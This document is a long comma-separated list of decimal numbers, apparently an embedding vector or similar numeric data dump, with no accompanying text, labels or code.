-0.014280465431511402, 0.004421799443662167, -0.005151813384145498, 0.002567216055467725, 0.02704528346657753, -0.010150671936571598, -0.037182051688432693, 0.010157624259591103, -0.0021170407999306917, -0.0017485575517639518, 0.02665594220161438, 0.008266540244221687, 0.0034206374548375607, -0.013752074912190437, 0.02729557454586029, -0.0007899795309640467, 0.0007791162352077663, -0.0018997747683897614, -0.015114767476916313, 0.006681366823613644, -0.02611364610493183, -0.029311802238225937, -0.0011028427397832274, -0.010637347586452961, -0.0008538557449355721, 0.019522661343216896, 0.023541215807199478, -0.01646355539560318, 0.0213164109736681, -0.004143699072301388, -0.017993109300732613, 0.008301302790641785, 0.0182851143181324, -0.01371035911142826, -0.007529573515057564, 0.015045242384076118, 0.006973372306674719, -0.028115971013903618, -0.026739371940493584, 0.044357046484947205, 0.003604878904297948, -0.022122902795672417, 0.004804187919944525, 0.01948094740509987, -0.03081354685127735, 0.004174985457211733, -0.004063745029270649, 0.035735927522182465, -0.0025480967015028, -0.022832058370113373, -0.005005810875445604, -0.00006490824307547882, -0.00835692323744297, 0.0205377284437418, 0.011089261621236801, -0.011972230859100819, 0.00441137095913291, 0.004790282808244228, 0.007293188013136387, 0.014947907067835331, -0.034567903727293015, 0.004028982482850552, -0.024611903354525566, -0.030869167298078537, 0.003264205763116479, 0.01142993476241827, 0.012034803628921509, -0.022303668782114983, 0.0006026961491443217, -0.004720757715404034, 0.007216710597276688, -0.002151803346350789, -0.01657479628920555, 0.0017442122334614396, -0.007557383738458157, -0.013286256231367588, -0.009809998795390129, -0.009983811527490616, 0.0026436937041580677, -0.015865638852119446, -0.02664203755557537, 0.03601402789354324, -0.008871409110724926, 0.015504108741879463, 0.0017615935066714883, 0.022150712087750435, -0.004880665335804224, 0.006490172818303108, -0.016811180859804153, -0.015448488295078278, 0.031397558748722076, -0.01385636255145073, 0.017951393499970436, -0.0163384098559618, 0.03017391450703144, 0.002183089731261134, 0.013953697867691517, -0.0066883196122944355, -0.005968734156340361, 0.017701102420687675, 0.0024611903354525566, -0.018048729747533798, 0.006705700885504484, -0.00536038912832737, 0.0008203967590816319, 0.014739331789314747, 0.013015108183026314, 0.00392121821641922, 0.00004549008735921234, 0.01960609294474125, -0.005012763198465109, -0.005701062269508839, 0.01800701394677162, -0.00966399535536766, -0.01671384647488594, 0.018743980675935745, -0.007195853162556887, 0.007550431415438652, 0.011791465803980827, -0.003917742054909468, 0.014753236435353756, 0.03445666283369064, -0.030229534953832626, -0.010150671936571598, -0.02897808328270912, -0.020231818780303, -0.008266540244221687, 0.0018250352004542947, -0.01814606413245201, -0.019105510786175728, 0.00350928190164268, -0.02235928736627102, 0.0028053398709744215, 0.006997706368565559, 0.004950190894305706, 0.027351193130016327, 0.004755520261824131, -0.03006267547607422, -0.017033660784363747, -0.0263778418302536, 0.007334903348237276, -0.05406275764107704, -0.005892256274819374, -0.04093640670180321, -0.033121779561042786, 0.006914276164025068, -0.001145426882430911, 0.005113574676215649, 0.020190102979540825, 0.020217914134263992, 0.031536608934402466, -0.016157643869519234, -0.028282830491662025, -0.00584706524387002, 0.01522600743919611, -0.015406773425638676, 0.008913123980164528, 0.04797235503792763, -0.0003741322143469006, 0.027782250195741653, -0.011464697308838367, 0.013258446007966995, 0.025168104097247124, -0.00732099823653698, -0.0029165800660848618, 0.017075376585125923, -0.014614186249673367, 0.015073052607476711, -0.026363937184214592, -0.008628071285784245, -0.0030191296245902777, -0.016491364687681198, -0.029033701866865158, -0.0273094791918993, -0.011325647123157978, -0.04480200633406639, 0.011513364501297474, 0.009524945169687271, -0.026155361905694008, -0.021274695172905922, 0.02142765186727047, 0.024792667478322983, 0.030396396294236183, -0.02886684238910675, 0.002443809062242508, -0.0011063189012929797, -0.0012905605835840106, 0.02833845093846321, -0.014808856882154942, 0.0215527955442667, -0.001193225383758545, -0.0131889209151268, 0.002920056227594614, -0.006983801256865263, 0.018910840153694153, -0.012125185690820217, -0.002918318146839738, -0.0012323332484811544, -0.02886684238910675, 0.008127490058541298, 0.009225987829267979, -0.006743939593434334, 0.006027830298990011, 0.016227170825004578, 0.0038447408005595207, 0.009587517939507961, -0.002066635061055422, 0.025279344990849495, 0.019439231604337692, -0.028560930863022804, -0.023485595360398293, 0.017798438668251038, -0.03045201487839222, -0.026572512462735176, -0.01683899201452732, 0.0415482297539711, -0.008440352976322174, -0.009351132437586784, 0.0021883039735257626, 0.003104297909885645, -0.0058331601321697235, 0.0028383643366396427, 0.000265499169472605, 0.014349990524351597, -0.025056863203644753, 0.0025115960743278265, -0.00007164349517552182, 0.03918437287211418, 0.010748588480055332, -0.024125227704644203, -0.014975717291235924, -0.012048708274960518, -0.034706953912973404, 0.010943258181214333, -0.00028635672060772777, -0.009399800561368465, -0.011096213944256306, 0.00993514433503151, -0.028505312278866768, -0.020551634952425957, -0.019049890339374542, -0.015281627885997295, 0.031036026775836945, -0.004202795214951038, 0.002150065265595913, 0.006994230207055807, 0.004157604184001684, -0.006837798282504082, -0.009983811527490616, 0.02049601450562477, -0.009740473702549934, 0.020593348890542984, -0.010004669427871704, 0.007564336061477661, -0.006580555345863104, 0.0031651323661208153, -0.004056792706251144, -0.0015825661830604076, -0.005798397585749626, -0.03342769294977188, 0.006413694936782122, 0.008398638106882572, -0.014669806696474552, 0.008690644055604935, -0.0009229463757947087, -0.014336085878312588, -0.011993088759481907, -0.0069177523255348206, -0.03281586989760399, -0.0034154229797422886, 0.0036813567858189344, 0.01437780074775219, 0.08331894129514694, -0.022025566548109055, -0.006573603022843599, 0.019258465617895126, -0.011422982439398766, 0.0012888225028291345, -0.007411380764096975, -0.01999543234705925, -0.0024524996988475323, 0.010755540803074837, 0.03445666283369064, -0.010296674445271492, 0.016672130674123764, 0.011144881136715412, -0.011110118590295315, 0.006052164360880852, 0.006295502185821533, 0.001753771910443902, -0.006212071981281042, -0.0008729751571081579, 0.010922401212155819, 0.012876057997345924, -0.0034640906378626823, -0.020690685138106346, 0.025251533836126328, -0.004199319053441286, -0.03676489740610123, -0.016366221010684967, -0.03084135614335537, -0.01710318773984909, -0.00627116858959198, -0.028268925845623016, -0.01339054387062788, -0.007675576489418745, 0.003667451674118638, 0.002287377370521426, 0.032204050570726395, -0.007856342010200024, -0.003768263151869178, -0.007571288850158453, 0.006476267706602812, -0.006935133598744869, -0.021636227145791054, 0.01006724126636982, 0.0071332803927361965, -0.009809998795390129, 0.02586335502564907, -0.009782188571989536, -0.016491364687681198, 0.010108957067131996, 0.006337217520922422, 0.012563194148242474, 0.019772952422499657, -0.0037369767669588327, -0.002254352904856205, 0.035346586257219315, 0.008176157251000404, 0.011478601954877377, 0.011638510040938854, -0.016658226028084755, 0.004543468356132507, 0.003208585549145937, -0.006187738385051489, -0.01150641217827797, -0.008057964965701103, -0.017144901677966118, -0.004432228393852711, 0.001088068587705493, -0.016894610598683357, 0.009114746935665607, -0.00685517955571413, 0.001858059666119516, -0.027726629748940468, -0.009427609853446484, 0.013383591547608376, 0.04366179555654526, -0.022136807441711426, 0.024472853168845177, 0.007988439872860909, -0.03437323495745659, 0.029728954657912254, 0.04744396358728409, -0.017075376585125923, 0.015531918033957481, -0.001039401046000421, 0.01169413048774004, -0.029311802238225937, -0.009691805578768253, 0.007849389687180519, -0.015420678071677685, -0.0021153027191758156, 0.0008968744077719748, 0.02897808328270912, -0.006438028998672962, 0.029840193688869476, 0.027351193130016327, 0.013682549819350243, -0.01778453402221203, -0.010769445449113846, 0.0024629284162074327, 0.002944390056654811, -0.0045538973063230515, 0.007731196470558643, -0.018507594242691994, -0.027351193130016327, 0.014975717291235924, -0.006643128115683794, 0.03673708811402321, -0.022651294246315956, -0.0016668654279783368, -0.036514610052108765, -0.005071859806776047, 0.030007055029273033, -0.0350128635764122, -0.003212061943486333, 0.01893865130841732, -0.000054316522437147796, -0.01724223792552948, -0.013689502142369747, -0.040463637560606, -0.025056863203644753, -0.017951393499970436, 0.032982729375362396, -0.0023725456558167934, 0.012709197588264942, 0.004157604184001684, 0.006949038710445166, -0.045525066554546356, 0.0312028881162405, 0.008704548701643944, 0.022512244060635567, -0.0005727134412154555, 0.012556241825222969, -0.0001214517469634302, 0.00973352137953043, -0.02623879164457321, 0.029617713764309883, 0.009385894984006882, -0.008725406602025032, -0.007870246656239033, -0.0102688642218709, 0.00875321589410305, 0.03698737919330597, -0.004960619378834963, 0.011673272587358952, -0.007390523329377174, -0.019508756697177887, 0.003973362501710653, 0.02258176915347576, -0.0006278990185819566, 0.007272330578416586, -0.029979243874549866, -0.005137908738106489, 0.028533121570944786, -0.005443819332867861, 0.013953697867691517, 0.030896976590156555, -0.01987028867006302, 0.011471649631857872, -0.0011636771960183978, 0.007619956508278847, -0.010880686342716217, -0.00803015474230051, 0.005662823561578989, 0.0044426568783819675, 0.029589904472231865, 0.023054540157318115, -0.029339613392949104, -0.034706953912973404, -0.017840152606368065, 0.011721940711140633, 0.020843639969825745, 0.00724452082067728, 0.0076686241663992405, 0.023221399635076523, 0.01592125929892063, -0.038628172129392624, 0.01078335102647543, 0.011082309298217297, 0.00967094860970974, 0.004199319053441286, 0.006931657437235117, 0.00020531646441668272, -0.0013227160088717937, 0.015017432160675526, -0.026989663019776344, 0.006382408551871777, 0.006378932390362024, -0.034178562462329865, 0.021844802424311638, -0.00695946766063571, 0.032593391835689545, 0.0067926072515547276, -0.01685289666056633, 0.0027949109207838774, -0.025182008743286133, 0.013105491176247597, -0.00402202969416976, -0.014864477328956127, 0.0049258568324148655, 0.004943238105624914, 0.0003328516613692045, 0.013070727698504925, -0.00164861511439085, 0.001882393378764391, -0.01110316626727581, 0.0046790423803031445, -0.0027306003030389547, -0.017436906695365906, -0.014148367568850517, 0.002787958597764373, 0.02338826097548008, 0.016797276213765144, 0.011193549260497093, 0.02797692082822323, -0.012771770358085632, 0.005753206089138985, 0.007585193961858749, -0.007115899119526148, -0.0163384098559618, 0.0026489081792533398, 0.012674435041844845, -0.00960837583988905, 0.01607421413064003, -0.012716149911284447, -0.0029687238857150078, 0.01775672286748886, -0.006629223003983498, -0.012757864780724049, 0.02194213680922985, -0.031814709305763245, 0.009232940152287483, 0.00972656812518835, 0.011311741545796394, -0.01674165576696396, -0.01320282556116581, -0.015017432160675526, 0.0016181978862732649, -0.012625766918063164, 0.018076539039611816, 0.00010396182187832892, -0.0055863456800580025, -0.0253627747297287, 0.009747426025569439, -0.009427609853446484, -0.00015827834431547672, 0.008787979371845722, -0.02662813290953636, -0.004887618124485016, 0.028157684952020645, -0.004953667055815458, -0.005836636293679476, 0.0023760220501571894, 0.012994250282645226, -0.012257283553481102, -0.0019067272078245878, -0.002233495470136404, 0.014544661156833172, 0.0007395737920887768, -0.00261066947132349, 0.0284775011241436, -0.007487858645617962, 0.001063734758645296, 0.0092190345749259, -0.010498297400772572, 0.022122902795672417, -0.01985638216137886, -0.013355781324207783, 0.035318776965141296, 0.007863294333219528, 0.00558286951854825, 0.0004167163569945842, 0.02170575223863125, -0.04438485577702522, -0.00665703322738409, 0.014878381974995136, -0.009073032066226006, -0.007126328069716692, -0.013077680952847004, -0.00790500920265913, 0.01352959405630827, 0.06012535095214844, 0.021497176960110664, -0.027545863762497902, -0.0194531362503767, 0.004630375187844038, -0.012208616361021996, 0.0074739535339176655, -0.01763157732784748, 0.01932799071073532, 0.0006261608796194196, 0.014051033183932304, -0.01788186840713024, -0.013119395822286606, 0.022818153724074364, -0.007613003719598055, -0.012945583090186119, 0.01935580186545849, -0.01568487286567688, -0.007293188013136387, 0.01448904164135456, 0.027518054470419884, 0.02466752380132675, -0.007814627140760422, -0.004362703301012516, 0.010553917847573757, -0.03556906804442406, -0.009893428534269333, -0.028560930863022804, 0.0024038320407271385, 0.007174995262175798, -0.006180785596370697, -0.006862132344394922, -0.021483270451426506, 0.021761372685432434, -0.0001312287204200402, 0.007647766266018152, 0.0057601588778197765, -0.01699194684624672, 0.012298999354243279, 0.005694109946489334, -0.021191265434026718, -0.030340775847434998, -0.011409076862037182, 0.0044426568783819675, 0.014864477328956127, 0.013891125097870827, -0.004206271376460791, -0.01761767268180847, -0.015323342755436897, 0.03565249592065811, 0.012472812086343765, 0.013168063014745712, 0.006159928161650896, -0.0023968794848769903, -0.0006622270448133349, 0.017798438668251038, -0.007849389687180519, 0.01685289666056633, 0.004331416916102171, -0.04163166135549545, 0.012236426584422588, -0.009754378348588943, 0.008377780206501484, 0.023471690714359283, 0.018104348331689835, -0.002203947165980935, -0.0034136848989874125, -0.0013357519637793303, -0.022011661902070045, -0.027879584580659866, -0.014322181232273579, -0.01594906859099865, 0.034039512276649475, 0.0053186737932264805, 0.025168104097247124, 0.03017391450703144, -0.0071193752810359, -0.0020631588995456696, -0.040046487003564835, -0.008009296841919422, -0.0019223704002797604, -0.00244728522375226, -0.008718453347682953, 0.010602585040032864, -0.007717291824519634, -0.012020898051559925, 0.021622322499752045, -0.003688309108838439, 0.0066187940537929535, -0.016880705952644348, 0.000716978101991117, 0.020273534581065178, -0.004216700326651335, 0.0014296108856797218, 0.006413694936782122, 0.021372031420469284, 0.005749729927629232, -0.008530735969543457, 0.009170367382466793, 0.004825045354664326, -0.014044079929590225, 0.01174975000321865, 0.009427609853446484, -0.015865638852119446, 0.00431055948138237, -0.018479784950613976, -0.0068343221209943295, -0.013522641733288765, -0.00447046710178256, -0.011283932253718376, 0.00483547430485487, 0.019147226586937904, 0.02352731116116047, 0.005544630810618401, -0.0002446416183374822, 0.0069177523255348206, 0.007522621192038059, -0.012903868220746517, -0.01280653290450573, -0.009490182623267174, 0.00217439909465611, 0.006139070726931095, 0.007800722029060125, 0.013022060506045818, 0.03225966915488243, -0.011714987456798553, -0.026850612834095955, 0.02508467435836792, 0.005457724444568157, 0.005749729927629232, 0.004241033922880888, -0.002016229322180152, -0.01777062751352787, -0.01661651022732258, -0.001833725837059319, -0.025418395176529884, 0.02861655130982399, -0.009538850747048855, 0.016268884763121605, -0.002125731436535716, 0.009705711156129837, -0.03125850856304169, -0.050614308565855026, -0.019244560971856117, -0.030869167298078537, 0.024013986811041832, -0.014614186249673367, -0.00966399535536766, -0.003078226000070572, 0.022387098520994186, 0.005242196377366781, 0.01371731236577034, -0.005169194657355547, 0.002680194564163685, 0.009691805578768253, -0.01339054387062788, -0.0152121027931571, -0.006465838756412268, 0.0365702286362648, 0.020551634952425957, -0.02270691469311714, -0.008586356416344643, -0.020343059673905373, -0.012521479278802872, 0.0008447305881418288, -0.028950272127985954, -0.012271189130842686, -0.00630940729752183, -0.011714987456798553, 0.002874864963814616, 0.011422982439398766, -0.002786220284178853, 0.02170575223863125, -0.010164576582610607, 0.007202805485576391, -0.003552735084667802, 0.009538850747048855, -0.009225987829267979, 0.015406773425638676, 0.017075376585125923, -0.009260750375688076, 0.013369685970246792, 0.022025566548109055, 0.011124024167656898, 0.016672130674123764, -0.0005084026488475502, -0.002118778880685568, 0.01169413048774004, -0.018591025844216347, 0.015865638852119446, 0.009851713664829731, 0.015712684020400047, 0.003264205763116479, -0.013626929372549057, -0.0018476308323442936, -0.016894610598683357, -0.025557445362210274, 0.017353476956486702, -0.021483270451426506, -0.008183110505342484, 0.004345322027802467, 0.02352731116116047, -0.005568964406847954, -0.014023222960531712, 0.028296735137701035, 0.0043175118044018745, 0.025974595919251442, -0.005579393357038498, -0.005635013338178396, -0.006184262223541737, -0.010060288943350315, -0.0014478611992672086, 0.004842426627874374, 0.0075782411731779575, 0.01346702128648758, 0.009684853255748749, -0.0010029003024101257, 0.016491364687681198, -0.022136807441711426, -0.018493689596652985, -0.018229493871331215, -0.0016981518128886819, -0.007202805485576391, 0.0006361551349982619, -0.01658870093524456, -0.015045242384076118, 0.008134442381560802, 0.0110475467517972, -0.011283932253718376, 0.010866780765354633, -0.008085775189101696, 0.0021657084580510855, -0.016936326399445534, -0.001997109968215227, -0.004755520261824131, -0.002874864963814616, -0.016922421753406525, -0.01842416450381279, -0.03946247324347496, -0.010213244706392288, 0.011130976490676403, -0.014266560785472393, -0.006358074955642223, 0.009302465245127678, 0.0009316370123997331, 0.0030730115249753, 0.0056176320649683475, -0.005026668310165405, -0.015740493312478065, 0.010310580022633076, 0.002836626023054123, -0.012222521007061005, 0.0057810163125395775, -0.014794952236115932, 0.015406773425638676, 0.029478663578629494, -0.010797255672514439, -0.016894610598683357, -0.005165718495845795, -0.0032989683095365763, -0.010623442940413952, 0.019314086064696312, 0.006712653208523989, -0.0032346576917916536, -0.025668684393167496, -0.010734682902693748, 0.008426448330283165, -0.008148347958922386, 0.00679608341306448, 0.018118254840373993, -0.005544630810618401, -0.004279273096472025, -0.0065145064145326614, 0.015573633834719658, -0.004901523236185312, 0.01156898494809866, -0.0101923868060112, 0.0012114756973460317, -0.007814627140760422, -0.004595612175762653, 0.014544661156833172, 0.025682590901851654, -0.005575917195528746, 0.011659367941319942, 0.012820437550544739, -0.0009307679138146341, 0.008857504464685917, 0.016546985134482384, -0.017562052235007286, -0.022901583462953568, 0.016546985134482384, 0.01437780074775219, 0.008767121471464634, -0.014530756510794163, -0.011534222401678562, -0.008961792103946209, -0.01932799071073532, -0.01274396013468504, 0.007279283367097378, 0.02534887008368969, -0.0028053398709744215, -0.023360449820756912, -0.0016286266036331654, -0.021719656884670258, 0.0025046435184776783, 0.009358084760606289, -0.007140232715755701, -0.022512244060635567, -0.02967333421111107, 0.004199319053441286, 0.03540220484137535, -0.005509868264198303, 0.005603726953268051, 0.0016625201096758246, -0.015156482346355915, 0.005600250791758299, -0.010957163758575916, 0.009351132437586784, 0.01385636255145073, -0.01565706357359886, 0.018465880304574966, 0.0042653679847717285, -0.003156441729515791, 0.007411380764096975, 0.012285093776881695, 0.015156482346355915, 0.018604930490255356, -0.0073488084599375725, -0.014655901119112968, -0.0059965443797409534, -0.006000020541250706, -0.0062781209126114845, 0.02572430483996868, -0.0073488084599375725, -0.016435746103525162, 0.0068343221209943295, 0.020968785509467125, -0.012952535413205624, -0.024917813017964363, 0.006180785596370697, 0.000612690404523164, -0.02782396413385868, -0.0007486989488825202, 0.0025620018132030964, -0.011214406229555607, 0.007418333552777767, -0.025515729561448097, 0.0215527955442667, 0.010484392754733562, 0.014947907067835331, 0.004463514778763056, -0.001165415276773274, 0.0036257365718483925, -0.023290924727916718, 0.012577099725604057, -0.02794910967350006, -0.013147206045687199, -0.0007552169263362885, -0.0006035651895217597, -0.022261952981352806, -0.015114767476916313, -0.004651232622563839, 0.007418333552777767, -0.024500662460923195, 0.003688309108838439, 0.020565539598464966, 0.002734076464548707, -0.004119365010410547, 0.010797255672514439, -0.014864477328956127, 0.010081146843731403, 0.0076686241663992405, 0.006413694936782122, 0.015643158927559853, -0.030007055029273033, -0.01508695725351572, 0.010713825933635235, 0.001222773571498692, 0.010748588480055332, 0.0049988580867648125, 0.030785735696554184, -0.007168042939156294, 0.0021326839923858643, 0.005614155903458595, 0.01896646060049534, -0.008676738478243351, 0.01535115297883749, 0.012180806137621403, 0.004129793960601091, -0.008509878069162369, 0.004668613895773888, -0.022289762273430824, -0.01568487286567688, -0.0017572481883689761, -0.01761767268180847, -0.008781026117503643, -0.0048737130127847195, -0.026099741458892822, 0.001008983701467514, 0.003342421492561698, -0.006483220029622316, 0.009392847307026386, -0.016102025285363197, -0.0074530960991978645, -0.013981507159769535, -0.000690906192176044, -0.009594470262527466, 0.029589904472231865, 0.005151813384145498, 0.02430599182844162, 0.006347646005451679, 0.005009287036955357, 0.007717291824519634, -0.00541948527097702, -0.038350071758031845, 0.008996554650366306, 0.004168032668530941, 0.0018650121055543423, 0.012841295450925827, 0.005596774630248547, -0.015518013387918472, 0.012723102234303951, 0.001833725837059319, -0.005054478533565998, 0.01896646060049534, 0.00024377256340812892, 0.011902705766260624, -0.021650131791830063, -0.005238720215857029, 0.00933027546852827, -0.011276978999376297, 0.004275796934962273, -0.02274862863123417, -0.00046321129775606096, 0.017993109300732613, -0.0021969948429614305, -0.0024924767203629017, 0.010595632717013359, -0.0025307154282927513, -0.011728893034160137, 0.019022081047296524, 0.004720757715404034, -0.012166901491582394, 0.012563194148242474, 0.014655901119112968, -0.028032541275024414, -0.02797692082822323, -0.017214426770806313, -0.007682529278099537, 0.009427609853446484, 0.006302454974502325, 0.027629295364022255, 0.003371969796717167, -0.000025474450012552552, -0.015531918033957481, 0.0048007117584347725, -0.012041755951941013, -0.03292711079120636, -0.01005333662033081, 0.0365702286362648, -0.0036257365718483925, -0.014934002421796322, -0.012570147402584553, 0.028505312278866768, 0.012730054557323456, -0.00525957765057683, 0.022261952981352806, -0.005892256274819374, 0.011005830951035023, -0.0033563266042619944, -0.0070811365731060505, -0.013925887644290924, 0.017423002049326897, 0.003427589777857065, -0.010526107624173164, 0.007432238664478064, -0.0033007063902914524, 0.0011645462363958359, 0.0010272341314703226, 0.00623292988166213, -0.005509868264198303, 0.002913103671744466, 0.006747415754944086, 0.0049049993976950645, 0.01814606413245201, 0.009747426025569439, -0.014572471380233765, -0.003535353811457753, -0.011993088759481907, 0.003764786757528782, 0.0019832048565149307, 0.031397558748722076, -0.01594906859099865, -0.017854059115052223, 0.0008916600490920246, 0.013439211063086987, -0.014134462922811508, -0.008516830392181873, -0.0020596825052052736, -0.001885869656689465, 0.004074173979461193, -0.00017631144146434963, -0.00829435046762228, 0.0410754568874836, 0.006469315383583307, 0.0035944501869380474, -0.0017902726540341973, -0.01482276152819395, -0.014906192198395729, 0.009246844798326492, -0.026044121012091637, -0.000020151430362602696, 0.01450294628739357, 0.009378942660987377, -0.012785675004124641, -0.01632450520992279, 0.014544661156833172, -0.00665703322738409, -0.01934189721941948, 0.00041019837954081595, -0.0263778418302536, 0.0006422385922633111, -0.010373152792453766, 0.006055640522390604, 0.004515658598393202, 0.013209778815507889, 0.0016520913923159242, -0.0038412646390497684, -0.01312634814530611, -0.01854931004345417, 0.009351132437586784, -0.025501824915409088, -0.0016355791594833136, -0.015768304467201233, -0.006159928161650896, 0.003316349582746625, 0.011151834391057491, 0.031175076961517334, -0.011450791731476784, 0.0003508847439661622, -0.0007669493206776679, 0.0021952565293759108, -0.023569025099277496, -0.010143719613552094, -0.004654708784073591, -0.00025137685588561, 0.0010967592243105173, -0.002683670725673437, -0.00012851289648097008, -0.006719605531543493, -0.0035805453080683947, -0.008516830392181873, -0.03095259703695774, -0.014614186249673367, -0.0045538973063230515, -0.017158806324005127, -0.008641975931823254, -0.02078801952302456, 0.026614226400852203, 0.00009929060615831986, -0.007925867103040218, 0.007821579463779926, -0.011374314315617085, 0.021747466176748276, -0.013738169334828854, -0.0021935184486210346, 0.000584445777349174, 0.0016633891500532627, -0.029868004843592644, -0.005012763198465109, -0.007487858645617962, 0.009448467753827572, 0.0003669624275062233, 0.019175035879015923, -0.014155320823192596, 0.00519700488075614, 0.00011971361527685076, -0.016129834577441216, -0.00003663649476948194, 0.00048406884889118373, 0.0043905130587518215, 0.034679144620895386, -0.03164784982800484, -0.006347646005451679, -0.021260790526866913, -0.02235928736627102, 0.002897460712119937, -0.01083897054195404, 0.0008173550595529377, 0.0024733571335673332, 0.0014808856649324298, 0.023360449820756912, 0.01802091859281063, 0.020343059673905373, 0.004296654369682074, -0.02181699126958847, -0.01973123662173748, -0.008843598887324333, -0.007786816917359829, 0.03645898774266243, -0.0007865032530389726, -0.004282749257981777, -0.013522641733288765, -0.006837798282504082, 0.0003554473223630339, 0.013487879186868668, 0.006184262223541737, -0.010797255672514439, -0.024000082165002823, 0.0011662844335660338, 0.003557949559763074, -0.009587517939507961, 0.03348331153392792, 0.03301054239273071, 0.002654122654348612, 0.006889942567795515, -0.007174995262175798, 0.013731217011809349, 0.020231818780303, 0.009337227791547775, -0.01998152770102024, 0.00574625376611948, 0.003161656204611063, -0.0017398669151589274, 0.0032555151265114546, 0.004494801163673401, 0.003747405484318733, -0.016254980117082596, 0.010018574073910713, 0.0028540072962641716, 0.01686680130660534, 0.011499459855258465, 0.006295502185821533, 0.015976879745721817, -0.012375476770102978, -0.01893865130841732, -0.019828572869300842, -0.00012492800306063145, 0.011409076862037182, 0.006841274909675121, 0.01971733197569847, -0.0025585254188627005, -0.004957143217325211, 0.009900381788611412, -0.012236426584422588, -0.016922421753406525, -0.007508716080337763, 0.0003426286275498569, -0.011596795171499252, -0.03212061896920204, -0.0028522692155092955, 0.01607421413064003, 0.013293208554387093, -0.03264901041984558, 0.0019727761391550303, 0.016755560413002968, -0.010623442940413952, -0.019522661343216896, -0.005860970355570316, -0.005603726953268051, -0.0016260194825008512, -0.0021865658927708864, -0.010692968033254147, 0.008885313756763935, 0.0071541378274559975, 0.001090675825253129, -0.0028557456098496914, -0.01547629851847887, 0.0032346576917916536, 0.02351340651512146, 0.001325323130004108, 0.002636741381138563, -0.005162242334336042, -0.018632739782333374, -0.0071019940078258514, -0.013049870729446411, -0.002841840498149395, 0.034289803355932236, -0.047471772879362106, -0.019300181418657303, -0.014336085878312588, 0.015309438109397888, 0.004077650140970945, 0.006073021795600653, -0.0025081196799874306, -0.0037230716552585363, -0.006611841730773449, -0.005075335968285799, 0.010470487177371979, -0.0034206374548375607, -0.009594470262527466, 0.009719615802168846, -0.002631526906043291, 0.007703386712819338, 0.005047525744885206, -0.006017401814460754, -0.01686680130660534, 0.014558566734194756, 0.007042897865176201, -0.008391685783863068, -0.0029808906838297844, -0.02366636134684086, -0.007272330578416586, 0.0068656085059046745, -0.01763157732784748, -0.005648918449878693, -0.0075782411731779575, 0.0035701163578778505, -0.00292353262193501, 0.005457724444568157, -0.01946704275906086, 0.01175670325756073, -0.000055158430768642575, -0.0036744042299687862, -0.007786816917359829, -0.015782209113240242, 0.003159918123856187, -0.0004958012141287327, -0.005137908738106489, -0.005770587362349033, -0.02928399294614792, -0.019759047776460648, 0.006848227232694626, -0.007981487549841404, -0.011388219892978668, -0.013070727698504925, -0.004199319053441286, -0.011881847865879536, 0.01827120967209339, 0.01247976440936327, 0.02822721004486084, -0.012187758460640907, 0.0035370918922126293, 0.0062259770929813385, 0.015073052607476711, -0.021497176960110664, 0.003938599955290556, -0.017589863389730453, -0.020078863948583603, -0.0041610803455114365, 0.011777560226619244, 0.007307093124836683, -0.0012670959113165736, -0.01800701394677162, -0.0037091667763888836, -0.008162252604961395, -0.010623442940413952, -0.0008104025037027895, 0.01163155771791935, 0.019035985693335533, -0.005377770401537418, 0.001035924768075347, 0.0068656085059046745, 0.015740493312478065, 0.01385636255145073, -0.007814627140760422, -0.013905029743909836, 0.007390523329377174, 0.01987028867006302, -0.011617652140557766, 0.014169225469231606, -0.024222562089562416, 0.02742071822285652, 0.001984942937269807, -0.003747405484318733, -0.00339804170653224, 0.028004730120301247, -0.0042862254194915295, 0.015545823611319065, -0.006347646005451679, -0.015003527514636517, -0.017589863389730453, -0.03606964647769928, -0.01987028867006302, -0.0011358670890331268, 0.0021361601538956165, 0.015142577700316906, -0.021775277331471443, 0.0026749800890684128, 0.008412542752921581, -0.019133321940898895, 0.010873733088374138, -0.012187758460640907, 0.03278806060552597, -0.005815778858959675, -0.016143739223480225, 0.0007595622446388006, -0.029033701866865158, 0.012146043591201305, 0.02600240521132946, 0.0184380691498518, -0.004077650140970945, 0.02430599182844162, 0.02625269629061222, -0.012264236807823181, -0.00036196529981680214, 0.00143047992605716, 0.03264901041984558, -0.007981487549841404, -0.01033143699169159, -0.008572450838983059, 0.004466990940272808, 0.011721940711140633, 0.019258465617895126, 0.005826207343488932, 0.0015260770451277494, 0.01031753234565258, 0.01998152770102024, 0.0065979366190731525, -0.013175016269087791, 0.014252656139433384, 0.002151803346350789, -0.007011611480265856, -0.013501783832907677, -0.024264277890324593, -0.01777062751352787, 0.02586335502564907, 0.004884141962975264, -0.003907313570380211, -0.005391675513237715, -0.013300160877406597, 0.02194213680922985, 0.01999543234705925, -0.003554473165422678, 0.007032468914985657, 0.001938013592734933, 0.01240328699350357, 0.005666299723088741, -0.012688339687883854, -0.0026940994430333376, -0.005325626581907272, 0.003159918123856187, 0.014850571751594543, -0.009274655021727085, -0.014148367568850517, -0.003667451674118638, -0.009830855764448643, -0.007960629649460316, -0.004095031414180994, -0.0016286266036331654, -0.00940675288438797, 0.0175064317882061, -0.020746305584907532, -0.0035457825288176537, -0.009559707716107368, -0.009698758833110332, -0.00013372728426475078, 0.01749252714216709, -0.029840193688869476, 0.0020023242104798555, -0.030646685510873795, 0.0071541378274559975, 0.04060268774628639, -0.0016972827725112438, -0.009184272028505802, 0.003643117845058441, -0.04071392863988876, -0.011610699817538261, -0.010880686342716217, 0.005054478533565998, -0.02600240521132946, 0.009476277977228165, -0.009212082251906395, -0.0022699960973113775, -0.0024594522546976805, -0.001514779170975089, -0.030146105214953423, -0.014516850933432579, -0.005016239359974861, -0.036125268787145615, 0.009309417568147182, -0.00013894167204853147, 0.008565498515963554, -0.005798397585749626, -0.003955981228500605, -0.0024055701214820147, 0.011867943219840527, 0.01567096821963787, -0.0011228311341255903, -0.0007678183610551059, 0.011867943219840527, 0.014558566734194756, -0.0016147216083481908, -0.025918975472450256, -0.011854037642478943, -0.004828521516174078, 0.00377173931337893, -0.02231757342815399, -0.000015181468370428775, -0.009580565616488457, -0.009803046472370625, 0.004665137734264135, 0.03367798402905464, 0.014906192198395729, 0.01312634814530611, -0.015059147030115128, 0.007032468914985657, -0.011513364501297474, -0.006222500931471586, 0.006003496702760458, -0.004703376442193985, 0.023582931607961655, -0.00663269916549325, -0.007988439872860909, -0.007460048422217369, 0.004216700326651335, -0.013960650190711021, 0.01332797110080719, 0.009942096658051014, -0.02088535577058792, -0.01090154331177473, -0.01738128811120987, 0.023541215807199478, -0.008787979371845722, -0.020690685138106346, 0.006653556600213051, -0.02245662361383438, 0.027629295364022255, 0.013981507159769535, 0.020064957439899445, 0.0061008320190012455, 0.007362713571637869, -0.017423002049326897, 